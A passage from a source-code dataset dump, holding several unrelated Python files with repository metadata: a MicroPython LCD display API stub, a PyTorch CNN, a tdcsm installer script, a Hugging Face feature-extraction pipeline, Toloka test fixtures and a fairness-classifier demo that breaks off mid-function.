for how the display can be connected to the pyboard.
"""
w: Any
# The width and height of the display, respectively, in pixels. These
# members are updated when calling :meth:`LCD160CR.set_orient` and should
# be considered read-only.
h: Any
def __init__(self, connect=None, *, pwr=None, i2c=None, spi=None, i2c_addr=98) -> None:
...
@staticmethod
def rgb(r, g, b) -> int:
"""
Return a 16-bit integer representing the given rgb color values. The
16-bit value can be used to set the font color (see
:meth:`LCD160CR.set_text_color`) pen color (see :meth:`LCD160CR.set_pen`)
and draw individual pixels.
"""
...
@staticmethod
def clip_line(data, w, h) -> Any:
"""
Clip the given line data. This is for internal use.
"""
...
def set_power(self, on) -> None:
"""
Turn the display on or off, depending on the given value of *on*: 0 or ``False``
will turn the display off, and 1 or ``True`` will turn it on.
"""
...
def set_orient(self, orient) -> None:
"""
Set the orientation of the display. The *orient* parameter can be one
of `PORTRAIT`, `LANDSCAPE`, `PORTRAIT_UPSIDEDOWN`, `LANDSCAPE_UPSIDEDOWN`.
"""
...
def set_brightness(self, value) -> None:
"""
Set the brightness of the display, between 0 and 31.
"""
...
def set_i2c_addr(self, addr) -> None:
"""
Set the I2C address of the display. The *addr* value must have the
lower 2 bits cleared.
"""
...
def set_uart_baudrate(self, baudrate) -> None:
"""
Set the baudrate of the UART interface.
"""
...
def set_startup_deco(self, value) -> None:
"""
Set the start-up decoration of the display. The *value* parameter can be a
logical or of `STARTUP_DECO_NONE`, `STARTUP_DECO_MLOGO`, `STARTUP_DECO_INFO`.
"""
...
def save_to_flash(self) -> Any:
"""
Save the following parameters to flash so they persist on restart and power up:
initial decoration, orientation, brightness, UART baud rate, I2C address.
"""
...
def set_pixel(self, x, y, c) -> None:
"""
Set the specified pixel to the given color. The color should be a 16-bit
integer and can be created by :meth:`LCD160CR.rgb`.
"""
...
def get_pixel(self, x, y) -> Any:
"""
Get the 16-bit value of the specified pixel.
"""
...
def get_line(self, x, y, buf) -> Any:
"""
Low-level method to get a line of pixels into the given buffer.
To read *n* pixels *buf* should be *2*n+1* bytes in length. The first byte
is a dummy byte and should be ignored, and subsequent bytes represent the
pixels in the line starting at coordinate *(x, y)*.
"""
...
def screen_dump(self, buf, x=0, y=0, w=None, h=None) -> Any:
"""
Dump the contents of the screen to the given buffer. The parameters *x* and *y*
specify the starting coordinate, and *w* and *h* the size of the region. If *w*
or *h* are ``None`` then they will take on their maximum values, set by the size
of the screen minus the given *x* and *y* values. *buf* should be large enough
to hold ``2*w*h`` bytes. If it's smaller then only the initial horizontal lines
will be stored.
"""
...
def screen_load(self, buf) -> None:
"""
Load the entire screen from the given buffer.
"""
...
def set_pos(self, x, y) -> None:
"""
Set the position for text output using :meth:`LCD160CR.write`. The position
is the upper-left corner of the text.
"""
...
def set_text_color(self, fg, bg) -> None:
"""
Set the foreground and background color of the text.
"""
...
def set_font(self, font, scale=0, bold=0, trans=0, scroll=0) -> None:
"""
Set the font for the text. Subsequent calls to `write` will use the newly
configured font. The parameters are:
- *font* is the font family to use, valid values are 0, 1, 2, 3.
- *scale* is a scaling value for each character pixel, where the pixels
are drawn as a square with side length equal to *scale + 1*. The value
can be between 0 and 63.
- *bold* controls the number of pixels to overdraw each character pixel,
making a bold effect. The lower 2 bits of *bold* are the number of
pixels to overdraw in the horizontal direction, and the next 2 bits are
for the vertical direction. For example, a *bold* value of 5 will
overdraw 1 pixel in both the horizontal and vertical directions.
- *trans* can be either 0 or 1 and if set to 1 the characters will be
drawn with a transparent background.
- *scroll* can be either 0 or 1 and if set to 1 the display will do a
soft scroll if the text moves to the next line.
"""
...
def write(self, s) -> None:
"""
Write text to the display, using the current position, color and font.
As text is written the position is automatically incremented. The
display supports basic VT100 control codes such as newline and backspace.
"""
...
def set_pen(self, line, fill) -> None:
"""
Set the line and fill color for primitive shapes.
"""
...
def erase(self) -> Any:
"""
Erase the entire display to the pen fill color.
"""
...
def dot(self, x, y) -> None:
"""
Draw a single pixel at the given location using the pen line color.
"""
...
def rect(self, x, y, w, h) -> Any:
...
def rect_outline(self, x, y, w, h) -> Any:
...
def rect_interior(self, x, y, w, h) -> None:
"""
Draw a rectangle at the given location and size using the pen line
color for the outline, and the pen fill color for the interior.
The `rect` method draws the outline and interior, while the other methods
just draw one or the other.
"""
...
def line(self, x1, y1, x2, y2) -> None:
"""
Draw a line between the given coordinates using the pen line color.
"""
...
def dot_no_clip(self, x, y) -> Any:
...
def rect_no_clip(self, x, y, w, h) -> Any:
...
def rect_outline_no_clip(self, x, y, w, h) -> Any:
...
def rect_interior_no_clip(self, x, y, w, h) -> Any:
...
def line_no_clip(self, x1, y1, x2, y2) -> Any:
"""
These methods are as above but don't do any clipping on the input
coordinates. They are faster than the clipping versions and can be
used when you know that the coordinates are within the display.
"""
...
def poly_dot(self, data) -> None:
"""
Draw a sequence of dots using the pen line color.
The *data* should be a buffer of bytes, with each successive pair of
bytes corresponding to coordinate pairs (x, y).
"""
...
def poly_line(self, data) -> Any:
"""
Similar to :meth:`LCD160CR.poly_dot` but draws lines between the dots.
"""
...
def touch_config(self, calib=False, save=False, irq=None) -> None:
"""
Configure the touch panel:
- If *calib* is ``True`` then the call will trigger a touch calibration of
the resistive touch sensor. This requires the user to touch various
parts of the screen.
- If *save* is ``True`` then the touch parameters will be saved to NVRAM
to persist across reset/power up.
- If *irq* is ``True`` then the display will be configured to pull the IRQ
line low when a touch force is detected. If *irq* is ``False`` then this
feature is disabled. If *irq* is ``None`` (the default value) then no
change is made to this setting.
"""
...
def is_touched(self) -> bool:
"""
Returns a boolean: ``True`` if there is currently a touch force on the screen,
``False`` otherwise.
"""
...
def get_touch(self) -> Tuple:
"""
Returns a 3-tuple of: *(active, x, y)*. If there is currently a touch force
on the screen then *active* is 1, otherwise it is 0. The *x* and *y* values
indicate the position of the current or most recent touch.
"""
...
def set_spi_win(self, x, y, w, h) -> None:
"""
Set the window that SPI data is written to.
"""
...
def fast_spi(self, flush=True) -> SPI:
"""
Ready the display to accept RGB pixel data on the SPI bus, resetting the location
of the first byte to go to the top-left corner of the window set by
:meth:`LCD160CR.set_spi_win`.
The method returns an SPI object which can be used to write the pixel data.
Pixels should be sent as 16-bit RGB values in the 5-6-5 format. The destination
counter will increase as data is sent, and data can be sent in arbitrary sized
chunks. Once the destination counter reaches the end of the window specified by
:meth:`LCD160CR.set_spi_win` it will wrap around to the top-left corner of that window.
"""
...
def show_framebuf(self, buf) -> None:
"""
Show the given buffer on the display. *buf* should be an array of bytes containing
the 16-bit RGB values for the pixels, and they will be written to the area
specified by :meth:`LCD160CR.set_spi_win`, starting from the top-left corner.
The `framebuf <framebuf.html>`_ module can be used to construct frame buffers
and provides drawing primitives. Using a frame buffer will improve
performance of animations when compared to drawing directly to the screen.
"""
...
def set_scroll(self, on) -> None:
"""
Turn scrolling on or off. This controls globally whether any window regions will
scroll.
"""
...
def set_scroll_win(self, win, x=-1, y=0, w=0, h=0, vec=0, pat=0, fill=0x07E0, color=0) -> None:
"""
Configure a window region for scrolling:
- *win* is the window id to configure. There are 0..7 standard windows for
general purpose use. Window 8 is the text scroll window (the ticker).
- *x*, *y*, *w*, *h* specify the location of the window in the display.
- *vec* specifies the direction and speed of scroll: it is a 16-bit value
of the form ``0bF.ddSSSSSSSSSSSS``. *dd* is 0, 1, 2, 3 for +x, +y, -x,
-y scrolling. *F* sets the speed format, with 0 meaning that the window
is shifted *S % 256* pixel every frame, and 1 meaning that the window
is shifted 1 pixel every *S* frames.
- *pat* is a 16-bit pattern mask for the background.
- *fill* is the fill color.
- *color* is the extra color, either of the text or pattern foreground.
"""
...
def set_scroll_win_param(self, win, param, value) -> Any:
"""
Set a single parameter of a scrolling window region:
- *win* is the window id, 0..8.
- *param* is the parameter number to configure, 0..7, and corresponds
to the parameters in the `set_scroll_win` method.
- *value* is the value to set.
"""
...
def set_scroll_buf(self, s) -> None:
"""
Set the string for scrolling in window 8. The parameter *s* must be a string
with length 32 or less.
"""
...
def jpeg(self, buf) -> None:
"""
Display a JPEG. *buf* should contain the entire JPEG data. JPEG data should
not include EXIF information. The following encodings are supported: Baseline
DCT, Huffman coding, 8 bits per sample, 3 color components, YCbCr4:2:2.
The origin of the JPEG is set by :meth:`LCD160CR.set_pos`.
"""
...
def jpeg_start(self, total_len) -> Any:
...
def jpeg_data(self, buf) -> None:
"""
Display a JPEG with the data split across multiple buffers. There must be
a single call to `jpeg_start` to begin with, specifying the total number of
bytes in the JPEG. Then this number of bytes must be transferred to the
display using one or more calls to the `jpeg_data` command.
"""
...
def feed_wdt(self) -> Any:
"""
The first call to this method will start the display's internal watchdog
timer. Subsequent calls will feed the watchdog. The timeout is roughly 30
seconds.
"""
...
def reset(self) -> None:
"""
Reset the display.
"""
...
| 308 | 0 | 216 |
e7dbbf31cdb2c338a7b379e15fa035c48dea2d84 | 1,491 | py | Python | models/cnn/covnet4.py | pmwaniki/ppg-analysis | ae1c76ca8b0eb95a51e3f48eccb8d0a76e7abfbf | [
"MIT"
] | 2 | 2022-02-23T05:36:48.000Z | 2022-03-04T11:53:29.000Z | models/cnn/covnet4.py | pmwaniki/ppg-analysis | ae1c76ca8b0eb95a51e3f48eccb8d0a76e7abfbf | [
"MIT"
] | null | null | null | models/cnn/covnet4.py | pmwaniki/ppg-analysis | ae1c76ca8b0eb95a51e3f48eccb8d0a76e7abfbf | [
"MIT"
] | 1 | 2022-01-15T03:31:30.000Z | 2022-01-15T03:31:30.000Z |
import torch.nn as nn
import torch
import torch.nn.functional as F
# net=Convnet4(2,64,z_dim=32)
# t=torch.randn((5,2,320,300))
# output=net(t)
# output.shape
| 26.157895 | 57 | 0.625084 |
import torch.nn as nn
import torch
import torch.nn.functional as F
def convblock(in_channels,out_channels,pooling=True):
if pooling:
return nn.Sequential(
nn.BatchNorm2d(in_channels),
nn.Conv2d(in_channels,out_channels,3,padding=1),
# nn.BatchNorm2d(out_channels),
nn.ReLU(),
nn.MaxPool2d(2)
)
return nn.Sequential(
nn.BatchNorm2d(in_channels),
nn.Conv2d(in_channels,out_channels,3,padding=1),
# nn.BatchNorm2d(out_channels),
nn.ReLU()
)
class Convnet4(nn.Module):
def __init__(self,in_features, hid_dim=64, z_dim=64):
super().__init__()
self.encoder=nn.Sequential(
convblock(in_features,hid_dim,pooling=False),
# convblock(hid_dim,hid_dim,pooling=False),
# convblock(hid_dim,hid_dim,pooling=False),
convblock(hid_dim,z_dim,pooling=True)
)
def forward(self,x):
x=self.encoder(x)
x=torch.mean(x,dim=(2,3))
return x
# net=Convnet4(2,64,z_dim=32)
# t=torch.randn((5,2,320,300))
# output=net(t)
# output.shape
class Classifier(nn.Module):
def __init__(self,in_features,hid_dim,z_dim):
super().__init__()
self.encoder=Convnet4(in_features,hid_dim,z_dim)
self.dense1=nn.Linear(z_dim,512)
self.dense2=nn.Linear(512,1)
def forward(self,x):
x=F.relu(self.encoder(x))
x=F.relu(self.dense1(x))
x=self.dense2(x)
return x
| 1,142 | 12 | 174 |
0d32eda95a14559f5e27b04ec1d3aaa58203600c | 2,891 | py | Python | tdcsm-install.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | null | null | null | tdcsm-install.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | 4 | 2020-07-21T18:42:22.000Z | 2020-10-14T00:50:45.000Z | tdcsm-install.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | 1 | 2020-08-05T20:09:41.000Z | 2020-08-05T20:09:41.000Z | #! /usr/bin/env python
import sys
def check_python():
"Check if the correct python version is installed"
if sys.version_info < (3, 0):
raise SystemExit("Python2 is not supported. Try rerunning with python3 or download the latest **64-bit** version from https://www.python.org/downloads/")
if sys.maxsize <= 2**32:
raise SystemExit("Only Python **64-bit** version is supported. Please uninstall the current version and install the latest Python3 64-bit version")
if sys.version_info < (3, 8, 0):
raise SystemExit("Python version %d.%d.%d is unsupported. Please upgrade to a version >= 3.8.0" % (sys.version_info[:3]))
try:
import tkinter
tcl_tk_installed = True
except ImportError:
tcl_tk_installed = False
if not tcl_tk_installed:
raise SystemExit("Python isn't installed with Tcl/Tk support enabled")
if __name__ == "__main__":
main()
| 29.20202 | 155 | 0.667589 | #! /usr/bin/env python
import sys
def check_python():
"Check if the correct python version is installed"
if sys.version_info < (3, 0):
raise SystemExit("Python2 is not supported. Try rerunning with python3 or download the latest **64-bit** version from https://www.python.org/downloads/")
if sys.maxsize <= 2**32:
raise SystemExit("Only Python **64-bit** version is supported. Please uninstall the current version and install the latest Python3 64-bit version")
if sys.version_info < (3, 8, 0):
raise SystemExit("Python version %d.%d.%d is unsupported. Please upgrade to a version >= 3.8.0" % (sys.version_info[:3]))
try:
import tkinter
tcl_tk_installed = True
except ImportError:
tcl_tk_installed = False
if not tcl_tk_installed:
raise SystemExit("Python isn't installed with Tcl/Tk support enabled")
def venv_base():
from pathlib import Path
return Path.home() / ".py" / "tdcsm"
def venv_bin(exec="python"):
from platform import system
return venv_base() / "Scripts" / f"{exec}.exe" if system() == "Windows" else venv_base() / "bin" / exec
def run(*args):
import subprocess
print("Running: '{}'...".format(" ".join(args)), flush=True, end='')
subprocess.run(args)
print("done")
def create_venv():
from logging import getLogger
if venv_bin().exists():
getLogger().warning(f"Found '{venv_bin()}', skipping recreating virtual environment")
return
venv_base().mkdir(parents=True, exist_ok=True)
run(sys.executable, "-m", "venv", str(venv_base()))
run(str(venv_bin()), "-m", "pip", "install", "--upgrade", "pip", "wheel")
def install_tdcsm():
run(str(venv_bin()), "-m", "pip", "install", "--upgrade", "tdcsm")
def create_shortcut():
from platform import system
from pathlib import Path
import stat
from textwrap import dedent
print("Creating a desktop shortcut...", flush=True, end='')
(Path.home() / 'tdcsm').mkdir(exist_ok=True)
if system() == "Windows":
locations = [Path.home() / 'tdcsm', *filter(Path.exists, (Path.home() / d / "Desktop" for d in ['.', 'OneDrive - Teradata']))]
sfx = 'bat'
tdcsm_cmd = dedent(f"""\
@echo off
set "PATH={venv_bin().parent};%PATH%"
{venv_bin()} -m pip install --upgrade tdcsm
cd "{Path.home() / 'tdcsm'}"
tdcsm gui
""")
else:
locations = [Path.home() / 'tdcsm', Path.home() / "Desktop"]
sfx = 'command' if system() == 'Darwin' else 'sh'
tdcsm_cmd = dedent(f"""\
#! /bin/sh
export PATH="{venv_bin().parent}:$PATH"
{venv_bin()} -m pip install --upgrade tdcsm
cd "{Path.home() / 'tdcsm'}"
tdcsm gui
""")
for loc in locations:
shortcut = loc / f"tdcsm-cmd.{sfx}"
with shortcut.open("w") as fh:
fh.write(tdcsm_cmd)
shortcut.chmod(shortcut.stat().st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
print("done", end='')
def main():
check_python()
create_venv()
install_tdcsm()
create_shortcut()
if __name__ == "__main__":
main()
| 1,868 | 0 | 161 |
4ae41ad49a05e26b0de3bd974202ec219d774141 | 3,657 | py | Python | psycho_embeddings/feature_extractor.py | MilaNLProc/psycho-embeddings | 2182076c1d455f8881858f0180852fe8a288f9b4 | [
"MIT"
] | null | null | null | psycho_embeddings/feature_extractor.py | MilaNLProc/psycho-embeddings | 2182076c1d455f8881858f0180852fe8a288f9b4 | [
"MIT"
] | null | null | null | psycho_embeddings/feature_extractor.py | MilaNLProc/psycho-embeddings | 2182076c1d455f8881858f0180852fe8a288f9b4 | [
"MIT"
] | null | null | null | from typing import Dict
from transformers.pipelines.base import GenericTensor, Pipeline
class NewFeatureExtractionPipeline(Pipeline):
"""
Feature extraction pipeline using no model head. This pipeline extracts the hidden states from the base
transformer, which can be used as features in downstream tasks.
This feature extraction pipeline can currently be loaded from [`pipeline`] using the task identifier:
`"feature-extraction"`.
All models may be used for this pipeline. See a list of all models, including community-contributed models on
[huggingface.co/models](https://huggingface.co/models).
Arguments:
model ([`PreTrainedModel`] or [`TFPreTrainedModel`]):
The model that will be used by the pipeline to make predictions. This needs to be a model inheriting from
[`PreTrainedModel`] for PyTorch and [`TFPreTrainedModel`] for TensorFlow.
tokenizer ([`PreTrainedTokenizer`]):
The tokenizer that will be used by the pipeline to encode data for the model. This object inherits from
[`PreTrainedTokenizer`].
modelcard (`str` or [`ModelCard`], *optional*):
Model card attributed to the model for this pipeline.
framework (`str`, *optional*):
The framework to use, either `"pt"` for PyTorch or `"tf"` for TensorFlow. The specified framework must be
installed.
If no framework is specified, will default to the one currently installed. If no framework is specified and
both frameworks are installed, will default to the framework of the `model`, or to PyTorch if no model is
provided.
task (`str`, defaults to `""`):
A task-identifier for the pipeline.
args_parser ([`~pipelines.ArgumentHandler`], *optional*):
Reference to the object in charge of parsing supplied pipeline parameters.
device (`int`, *optional*, defaults to -1):
Device ordinal for CPU/GPU supports. Setting this to -1 will leverage CPU, a positive will run the model on
the associated CUDA device id.
"""
def __call__(self, *args, **kwargs):
"""
Extract the features of the input(s).
Args:
args (`str` or `List[str]`): One or several texts (or one list of texts) to get the features of.
Return:
A nested list of `float`: The features computed by the model.
"""
return super().__call__(*args, **kwargs)
| 48.118421 | 119 | 0.655182 | from typing import Dict
from transformers.pipelines.base import GenericTensor, Pipeline
class NewFeatureExtractionPipeline(Pipeline):
"""
Feature extraction pipeline using no model head. This pipeline extracts the hidden states from the base
transformer, which can be used as features in downstream tasks.
This feature extraction pipeline can currently be loaded from [`pipeline`] using the task identifier:
`"feature-extraction"`.
All models may be used for this pipeline. See a list of all models, including community-contributed models on
[huggingface.co/models](https://huggingface.co/models).
Arguments:
model ([`PreTrainedModel`] or [`TFPreTrainedModel`]):
The model that will be used by the pipeline to make predictions. This needs to be a model inheriting from
[`PreTrainedModel`] for PyTorch and [`TFPreTrainedModel`] for TensorFlow.
tokenizer ([`PreTrainedTokenizer`]):
The tokenizer that will be used by the pipeline to encode data for the model. This object inherits from
[`PreTrainedTokenizer`].
modelcard (`str` or [`ModelCard`], *optional*):
Model card attributed to the model for this pipeline.
framework (`str`, *optional*):
The framework to use, either `"pt"` for PyTorch or `"tf"` for TensorFlow. The specified framework must be
installed.
If no framework is specified, will default to the one currently installed. If no framework is specified and
both frameworks are installed, will default to the framework of the `model`, or to PyTorch if no model is
provided.
task (`str`, defaults to `""`):
A task-identifier for the pipeline.
args_parser ([`~pipelines.ArgumentHandler`], *optional*):
Reference to the object in charge of parsing supplied pipeline parameters.
device (`int`, *optional*, defaults to -1):
Device ordinal for CPU/GPU supports. Setting this to -1 will leverage CPU, a positive will run the model on
the associated CUDA device id.
"""
def __init__(self, layer, **kwargs):
self.layer = layer
super().__init__(**kwargs)
def _sanitize_parameters(self, truncation=None, **kwargs):
preprocess_params = {}
if truncation is not None:
preprocess_params["truncation"] = truncation
return preprocess_params, {}, {}
def preprocess(self, inputs, truncation=None) -> Dict[str, GenericTensor]:
return_tensors = self.framework
if truncation is None:
kwargs = {}
else:
kwargs = {"truncation": truncation}
model_inputs = self.tokenizer(inputs, return_tensors=return_tensors, **kwargs)
return model_inputs
def _forward(self, model_inputs):
model_outputs = self.model(**model_inputs)
return model_outputs
def postprocess(self, model_outputs):
# [0] is the first available tensor, logits or last_hidden_state.
if self.framework == "pt":
return model_outputs["hidden_states"][self.layer].numpy().tolist()
elif self.framework == "tf":
return model_outputs["hidden_states"][self.layer].numpy().tolist()
def __call__(self, *args, **kwargs):
"""
Extract the features of the input(s).
Args:
args (`str` or `List[str]`): One or several texts (or one list of texts) to get the features of.
Return:
A nested list of `float`: The features computed by the model.
"""
return super().__call__(*args, **kwargs)
| 1,016 | 0 | 135 |
b5dbb0b0bcee643f1fd34734165384f8ac4f6dea | 5,494 | py | Python | tests/app/conftest.py | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 153 | 2021-02-06T13:41:11.000Z | 2022-03-19T17:51:01.000Z | tests/app/conftest.py | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 29 | 2021-01-15T12:54:37.000Z | 2022-02-07T07:45:32.000Z | tests/app/conftest.py | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 17 | 2021-01-29T15:20:04.000Z | 2022-01-30T07:21:03.000Z | import pytest
from decimal import Decimal
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
| 29.223404 | 61 | 0.328176 | import pytest
from decimal import Decimal
@pytest.fixture
def app_map():
return {
'constraints_description': 'constraints description',
'default_item_price': Decimal(0.1),
'description': 'app description',
'examples': {},
'id': '123',
'image': 'image',
'input_spec': {
'id': {
'type': 'string',
'required': False,
'hidden': False
},
'text': {
'type': 'string',
'required': True,
'hidden': False
}
},
'name': 'app name',
'output_spec': {
'result': {
'type': 'array_string',
'required': True,
'hidden': False
},
'confidence': {
'type': 'float',
'required': False,
'hidden': False
}
},
'param_spec': {
'fields': {
'required': [
'default_language',
'name',
'instruction_text2_label',
'option_multiple_choice',
'option_other',
'instruction_classes',
'instruction_examples',
'instruction_intro'
],
'properties': {
'name': {
'type': 'string'
},
'option_other': {
'type': 'boolean'
},
'default_language': {
'type': 'string'
},
'instruction_intro': {
'type': 'string'
},
'instruction_classes': {
'type': 'array',
'items': {
'type': 'object',
'required': [
'label',
'description',
'value'
],
'properties': {
'label': {
'type': 'string'
},
'value': {
'type': 'string'
},
'description': {
'type': 'string'
}
}
}
},
'instruction_examples': {
'type': 'array',
'items': {
'type': 'object',
'required': [
'description',
'label',
'text'
],
'properties': {
'label': {
'type': 'string'
},
'text': {
'type': 'string'
},
'description': {
'type': 'string'
}
}
}
},
'option_multiple_choice': {
'type': 'boolean'
},
'instruction_text_label': {
'type': 'string'
},
}
}
},
}
@pytest.fixture
def app_project_map():
return {
'app_id': '123',
'parent_app_project_id': '',
'name': 'ah-create-test',
'parameters': {
'name': 'ah-create-test'
}
}
@pytest.fixture
def app_project_map_with_readonly(app_project_map):
return {
**app_project_map,
'id': '123',
'status': 'READY',
'created': '2021-09-29T15:13:38.491000',
'errors': [],
'item_price': 0.0000,
'read_only': False
}
@pytest.fixture
def app_item_map():
return {
'batch_id': '123',
'input_data': {
'id': '124',
'text': 'I smell bad after the last night.'
}
}
@pytest.fixture
def app_item_map_with_readonly(app_item_map):
return {
**app_item_map,
'id': '123',
'app_project_id': '123',
'status': 'COMPLETED',
'output_data': {
'result': 'correct',
'confidence': Decimal(0.82)
},
'created_at': '2021-09-28T15:56:25.193000',
'started_at': '2021-09-28T15:56:30.309920',
'finished_at': '2021-09-28T16:07:12.307169'
}
@pytest.fixture
def app_batch_map():
return {
'id': '123',
'app_project_id': '123',
'status': 'COMPLETED',
'name': '1000-items',
'items_count': 1000,
'item_price': 0.0000,
'cost': 0.0000,
'created_at': '2021-09-28T15:56:25.193000',
'started_at': '2021-09-28T15:56:30.201000',
'finished_at': '2021-09-28T16:07:13.400000',
'read_only': False
}
| 5,212 | 0 | 132 |
18496a724ec7f11294f3696d4522309779f5f9f2 | 3,829 | py | Python | fairness/algorithms/zafar/fair-classification-master/disparate_mistreatment/synthetic_data_demo/decision_boundary_demo.py | yashwarlord/fairness-comparison | 366a4e4bb70498ac7498e4a98f50e3585f7881d3 | [
"Apache-2.0"
] | 146 | 2018-02-14T20:59:29.000Z | 2022-03-26T00:44:28.000Z | fairness/algorithms/zafar/fair-classification-master/disparate_mistreatment/synthetic_data_demo/decision_boundary_demo.py | yashwarlord/fairness-comparison | 366a4e4bb70498ac7498e4a98f50e3585f7881d3 | [
"Apache-2.0"
] | 6 | 2018-03-15T01:39:53.000Z | 2021-11-15T17:47:02.000Z | fairness/algorithms/zafar/fair-classification-master/disparate_mistreatment/synthetic_data_demo/decision_boundary_demo.py | yashwarlord/fairness-comparison | 366a4e4bb70498ac7498e4a98f50e3585f7881d3 | [
"Apache-2.0"
] | 50 | 2018-02-16T15:27:29.000Z | 2022-03-01T08:59:28.000Z | import os,sys
import numpy as np
from generate_synthetic_data import *
sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
import utils as ut
import funcs_disp_mist as fdm
import plot_syn_boundaries as psb
def test_synthetic_data():
""" Generate the synthetic data """
data_type = 1
X, y, x_control = generate_synthetic_data(data_type=data_type, plot_data=True) # set plot_data to False to skip the data plot
sensitive_attrs = x_control.keys()
""" Split the data into train and test """
train_fold_size = 0.5
x_train, y_train, x_control_train, x_test, y_test, x_control_test = ut.split_into_train_test(X, y, x_control, train_fold_size)
cons_params = None # constraint parameters, will use them later
loss_function = "logreg" # perform the experiments with logistic regression
EPS = 1e-4
""" Classify the data while optimizing for accuracy """
print
print "== Unconstrained (original) classifier =="
w_uncons, acc_uncons, s_attr_to_fp_fn_test_uncons = train_test_classifier()
print "\n-----------------------------------------------------------------------------------\n"
""" Now classify such that we optimize for accuracy while achieving perfect fairness """
print
print "== Classifier with fairness constraint =="
print "\n\n=== Constraints on FPR ===" # setting parameter for constraints
cons_type = 1 # FPR constraint -- just change the cons_type, the rest of parameters should stay the same
tau = 5.0
mu = 1.2
sensitive_attrs_to_cov_thresh = {"s1": {0:{0:0, 1:0}, 1:{0:0, 1:0}, 2:{0:0, 1:0}}} # zero covariance threshold, means try to get the fairest solution
cons_params = {"cons_type": cons_type,
"tau": tau,
"mu": mu,
"sensitive_attrs_to_cov_thresh": sensitive_attrs_to_cov_thresh}
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
print "\n\n=== Constraints on FNR ==="
cons_type = 2
cons_params["cons_type"] = cons_type # FNR constraint -- just change the cons_type, the rest of parameters should stay the same
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
print "\n\n=== Constraints on both FPR and FNR ==="
cons_type = 4
cons_params["cons_type"] = cons_type # both FPR and FNR constraints
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
return
if __name__ == '__main__':
main() | 44.011494 | 217 | 0.68608 | import os,sys
import numpy as np
from generate_synthetic_data import *
sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
import utils as ut
import funcs_disp_mist as fdm
import plot_syn_boundaries as psb
def test_synthetic_data():
""" Generate the synthetic data """
data_type = 1
X, y, x_control = generate_synthetic_data(data_type=data_type, plot_data=True) # set plot_data to False to skip the data plot
sensitive_attrs = x_control.keys()
""" Split the data into train and test """
train_fold_size = 0.5
x_train, y_train, x_control_train, x_test, y_test, x_control_test = ut.split_into_train_test(X, y, x_control, train_fold_size)
cons_params = None # constraint parameters, will use them later
loss_function = "logreg" # perform the experiments with logistic regression
EPS = 1e-4
def train_test_classifier():
w = fdm.train_model_disp_mist(x_train, y_train, x_control_train, loss_function, EPS, cons_params)
train_score, test_score, cov_all_train, cov_all_test, s_attr_to_fp_fn_train, s_attr_to_fp_fn_test = fdm.get_clf_stats(w, x_train, y_train, x_control_train, x_test, y_test, x_control_test, sensitive_attrs)
# accuracy and FPR are for the test because we need of for plotting
return w, test_score, s_attr_to_fp_fn_test
""" Classify the data while optimizing for accuracy """
print
print "== Unconstrained (original) classifier =="
w_uncons, acc_uncons, s_attr_to_fp_fn_test_uncons = train_test_classifier()
print "\n-----------------------------------------------------------------------------------\n"
""" Now classify such that we optimize for accuracy while achieving perfect fairness """
print
print "== Classifier with fairness constraint =="
print "\n\n=== Constraints on FPR ===" # setting parameter for constraints
cons_type = 1 # FPR constraint -- just change the cons_type, the rest of parameters should stay the same
tau = 5.0
mu = 1.2
sensitive_attrs_to_cov_thresh = {"s1": {0:{0:0, 1:0}, 1:{0:0, 1:0}, 2:{0:0, 1:0}}} # zero covariance threshold, means try to get the fairest solution
cons_params = {"cons_type": cons_type,
"tau": tau,
"mu": mu,
"sensitive_attrs_to_cov_thresh": sensitive_attrs_to_cov_thresh}
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
print "\n\n=== Constraints on FNR ==="
cons_type = 2
cons_params["cons_type"] = cons_type # FNR constraint -- just change the cons_type, the rest of parameters should stay the same
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
print "\n\n=== Constraints on both FPR and FNR ==="
cons_type = 4
cons_params["cons_type"] = cons_type # both FPR and FNR constraints
